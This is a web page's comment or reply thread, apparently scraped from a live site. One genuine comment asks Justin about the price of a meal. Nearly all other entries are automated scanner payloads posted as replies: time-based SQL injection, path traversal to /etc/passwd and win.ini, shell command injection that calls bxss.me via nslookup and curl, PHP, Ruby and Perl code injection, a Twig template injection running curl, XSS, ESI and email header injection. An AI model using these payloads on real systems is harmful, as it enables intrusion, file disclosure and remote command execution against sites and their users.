re: Just_Ingest
-1 waitfor delay '0:0:15' --
re: Just_Ingest
WL4v2Qib'; waitfor delay '0:0:15' --
re: Just_Ingest
-1 OR 714=(SELECT 714 FROM PG_SLEEP(15))--
re: Just_Ingest
-1) OR 518=(SELECT 518 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: Just_Ingest
XJL8cM3U' OR 890=(SELECT 890 FROM PG_SLEEP(15))--
re: Just_Ingest
EikVHyUe') OR 984=(SELECT 984 FROM PG_SLEEP(15))--
re: Just_Ingest
THmUoxTa')) OR 535=(SELECT 535 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
'"
re: Just_Ingest
@@gmqx3
re: Just_Ingest
(select 198766*667891)
re: Just_Ingest
(select 198766*667891 from DUAL)
Justin, can I ask what is the cost of your meal there? 38,500jpy?
re: guest
eWyEWjM2
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+802-802-1=0+0+0+1
re: guest
-1 OR 3+802-802-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
clNG0hzC
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 OR 2+772-772-1=0+0+0+1
re: guest
-1 OR 3+772-772-1=0+0+0+1
re: guest
1 waitfor delay '0:0:15' --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
kZhAXP7c'; waitfor delay '0:0:15' --
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
-5 OR 491=(SELECT 491 FROM PG_SLEEP(15))--
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
-5) OR 732=(SELECT 732 FROM PG_SLEEP(15))--
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1)) OR 603=(SELECT 603 FROM PG_SLEEP(15))--
re: guest
-1; waitfor delay '0:0:15' --
re: guest
EyRtiW9b' OR 978=(SELECT 978 FROM PG_SLEEP(15))--
re: guest
-1); waitfor delay '0:0:15' --
re: guest
rWX07zWp') OR 328=(SELECT 328 FROM PG_SLEEP(15))--
re: guest
1 waitfor delay '0:0:15' --
re: guest
7yfvOgsY')) OR 513=(SELECT 513 FROM PG_SLEEP(15))--
re: guest
MqSxdPg7'; waitfor delay '0:0:15' --
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
-5 OR 95=(SELECT 95 FROM PG_SLEEP(15))--
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
-5) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
-1)) OR 192=(SELECT 192 FROM PG_SLEEP(15))--
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
D05fbSE4' OR 109=(SELECT 109 FROM PG_SLEEP(15))--
re: guest
@@IucrN
re: guest
pbnZcC7d') OR 409=(SELECT 409 FROM PG_SLEEP(15))--
re: guest
dyYxvfsB')) OR 469=(SELECT 469 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@QcJ79
re: guest
1mxEM56IO
re: guest
response.write(9661717*9785777)
re: guest
'+response.write(9661717*9785777)+'
re: guest
"+response.write(9661717*9785777)+"
re: guest
%0abcc:074625.67-14561.67.b5c43.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-14562.67.b5c43.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999274+9999283}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
)
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
!(()&&!|*|*|
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
^(#$!@#$)(()))******
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo zcggak$()\ kllbgt\nz^xyu||a #' &echo zcggak$()\ kllbgt\nz^xyu||a #|" &echo zcggak$()\ kllbgt\nz^xyu||a #
re: guest
&echo rspkry$()\ fpxrqx\nz^xyu||a #' &echo rspkry$()\ fpxrqx\nz^xyu||a #|" &echo rspkry$()\ fpxrqx\nz^xyu||a #
re: guest
/etc/passwd
re: guest
|echo siqvrd$()\ jygzwc\nz^xyu||a #' |echo siqvrd$()\ jygzwc\nz^xyu||a #|" |echo siqvrd$()\ jygzwc\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
(nslookup hitjhplhrkrtr64878.bxss.me||perl -e "gethostbyname('hitjhplhrkrtr64878.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
$(nslookup hitvefmuatkye3e427.bxss.me||perl -e "gethostbyname('hitvefmuatkye3e427.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
'.gethostbyname(lc('hituo'.'azjbzpyw85c6b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(78).chr(113).chr(84).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&nslookup hitmqeucetomy08e5a.bxss.me&'\"`0&nslookup hitmqeucetomy08e5a.bxss.me&`'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
".gethostbyname(lc("hitnt"."ywncnlcy5cb7e.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(69).chr(121).chr(70)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
&(nslookup hitvlbrkhqlaxd1683.bxss.me||perl -e "gethostbyname('hitvlbrkhqlaxd1683.bxss.me')")&'\"`0&(nslookup hitvlbrkhqlaxd1683.bxss.me||perl -e "gethostbyname('hitvlbrkhqlaxd1683.bxss.me')")&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
Http://bxss.me/t/fit.txt
re: guest
|(nslookup hitddhdpiwspn261f8.bxss.me||perl -e "gethostbyname('hitddhdpiwspn261f8.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
`(nslookup hitroyjbbykso99599.bxss.me||perl -e "gethostbyname('hitroyjbbykso99599.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
/etc/shells
re: guest
;(nslookup hitddnyptaifa41675.bxss.me||perl -e "gethostbyname('hitddnyptaifa41675.bxss.me')")|(nslookup hitddnyptaifa41675.bxss.me||perl -e "gethostbyname('hitddnyptaifa41675.bxss.me')")&(nslookup hitddnyptaifa41675.bxss.me||perl -e "gethostbyname('hitddnyptaifa41675.bxss.me')")
re: guest
file:///etc/passwd
re: guest
c:/windows/win.ini
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(83).concat(101).concat(70)+(require"socket"
Socket.gethostbyname("hitsv"+"srltxmvbff0eb.bxss.me.")[3].to_s)+"
re: guest
/../../../../../../../../../../boot.ini
re: guest
'+'A'.concat(70-3).concat(22*4).concat(105).concat(84).concat(114).concat(67)+(require'socket'
Socket.gethostbyname('hitxt'+'edjaxxpwc7bb9.bxss.me.')[3].to_s)+'
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
';print(md5(31337));$a='
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
";print(md5(31337));$a="
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
'.print(md5(31337)).'
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+43-43-1=0+0+0+1 --
re: guest
-1 OR 3+43-43-1=0+0+0+1 --
re: guest
-1 OR 2+202-202-1=0+0+0+1
re: guest
-1 OR 3+202-202-1=0+0+0+1
re: guest
-1' OR 2+607-607-1=0+0+0+1 --
re: guest
-1' OR 3+607-607-1=0+0+0+1 --
re: guest
-1' OR 2+847-847-1=0+0+0+1 or 'FJJ4Jvbq'='
re: guest
-1' OR 3+847-847-1=0+0+0+1 or 'FJJ4Jvbq'='
re: guest
-1" OR 2+19-19-1=0+0+0+1 --
re: guest
-1" OR 3+19-19-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
SsZxthme'; waitfor delay '0:0:15' --
re: guest
-5 OR 48=(SELECT 48 FROM PG_SLEEP(15))--
re: guest
-5) OR 371=(SELECT 371 FROM PG_SLEEP(15))--
re: guest
-1)) OR 44=(SELECT 44 FROM PG_SLEEP(15))--
re: guest
xJmNndE5' OR 962=(SELECT 962 FROM PG_SLEEP(15))--
re: guest
dc6uvBi5') OR 95=(SELECT 95 FROM PG_SLEEP(15))--
re: guest
9vGGlwcE')) OR 934=(SELECT 934 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@QI5ye
re: guest
1BDXM5M9ZC0
re: guest
response.write(9200068*9552060)
re: guest
'+response.write(9200068*9552060)+'
re: guest
"+response.write(9200068*9552060)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999801+10000154}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
echo mmdung$()\ gvpxvc\nz^xyu||a #' &echo mmdung$()\ gvpxvc\nz^xyu||a #|" &echo mmdung$()\ gvpxvc\nz^xyu||a #
re: guest
&echo hvfkur$()\ wqrwmf\nz^xyu||a #' &echo hvfkur$()\ wqrwmf\nz^xyu||a #|" &echo hvfkur$()\ wqrwmf\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
|echo jugilp$()\ rjujcr\nz^xyu||a #' |echo jugilp$()\ rjujcr\nz^xyu||a #|" |echo jugilp$()\ rjujcr\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
expr 9000373707 - 981609
re: guest
'.gethostbyname(lc('hitjc'.'rqvexqtp2d37b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(74).chr(114).chr(73).'
re: guest
/etc/shells
re: guest
(nslookup -q=cname hitudypxswccx2707e.bxss.me||curl hitudypxswccx2707e.bxss.me))
re: guest
".gethostbyname(lc("hitgg"."roemwkkle30dc.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(71).chr(110).chr(75)."
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
$(nslookup -q=cname hitsddvowxvaw32d23.bxss.me||curl hitsddvowxvaw32d23.bxss.me)
re: guest
gethostbyname(lc('hitwn'.'jnrlbrnme1e63.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(71).chr(101).chr(82)
re: guest
c:/windows/win.ini
re: guest
&nslookup -q=cname hitzauvkksmjqccd61.bxss.me&'\"`0&nslookup -q=cname hitzauvkksmjqccd61.bxss.me&`'
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
bxss.me
re: guest
&(nslookup -q=cname hitlsgylkjzti423bd.bxss.me||curl hitlsgylkjzti423bd.bxss.me)&'\"`0&(nslookup -q=cname hitlsgylkjzti423bd.bxss.me||curl hitlsgylkjzti423bd.bxss.me)&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
|(nslookup -q=cname hitjdbypdbcxt3c311.bxss.me||curl hitjdbypdbcxt3c311.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
`(nslookup -q=cname hitpmrnlcgorn5d348.bxss.me||curl hitpmrnlcgorn5d348.bxss.me)`
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
;(nslookup -q=cname hitrnfmnwgxtnd9e76.bxss.me||curl hitrnfmnwgxtnd9e76.bxss.me)|(nslookup -q=cname hitrnfmnwgxtnd9e76.bxss.me||curl hitrnfmnwgxtnd9e76.bxss.me)&(nslookup -q=cname hitrnfmnwgxtnd9e76.bxss.me||curl hitrnfmnwgxtnd9e76.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitgeteuddaune747b.bxss.me||curl${IFS}hitgeteuddaune747b.bxss.me)
re: guest
";print(md5(31337));$a="
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitalxwixaqyk450e0.bxss.me||curl${IFS}hitalxwixaqyk450e0.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitalxwixaqyk450e0.bxss.me||curl${IFS}hitalxwixaqyk450e0.bxss.me)&`'
re: guest
${@print(md5(31337))}
re: guest
'"()
re: guest
${@print(md5(31337))}\
re: guest
'&&sleep(27*1000)*domzkp&&'
re: guest
'.print(md5(31337)).'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"&&sleep(27*1000)*nyklim&&"
re: guest
bxss.me/t/xss.html?%00
re: guest
'||sleep(27*1000)*mxmhrq||'
re: guest
"||sleep(27*1000)*eefcqr||"
re: guest
"+"A".concat(70-3).concat(22*4).concat(99).concat(76).concat(105).concat(82)+(require"socket"
Socket.gethostbyname("hitom"+"fsjfyzdz3a019.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(111).concat(87).concat(115).concat(88)+(require'socket'
Socket.gethostbyname('hitab'+'qbugiwhi328de.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(108).concat(88).concat(97).concat(67)+(require'socket'
Socket.gethostbyname('hithj'+'mftvebzdcc4f0.bxss.me.')[3].to_s)
re: guest
'"
re: guest
replies
re: guest
<!--
re: guest
replies�
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >aRHG(9189)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitptwsbqzfnkfe9e2.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >aRHG(9713)</ScRiPt>
re: guest
9440406
re: guest
haIBjrqo
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
6CqdYVMa'; waitfor delay '0:0:15' --
re: guest
-1 OR 608=(SELECT 608 FROM PG_SLEEP(15))--
re: guest
-1) OR 654=(SELECT 654 FROM PG_SLEEP(15))--
re: guest
-1)) OR 258=(SELECT 258 FROM PG_SLEEP(15))--
re: guest
kl5MwrzK' OR 379=(SELECT 379 FROM PG_SLEEP(15))--
re: guest
jt3DBQgn') OR 255=(SELECT 255 FROM PG_SLEEP(15))--
re: guest
4vI5VcXM')) OR 89=(SELECT 89 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@TwGDG
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
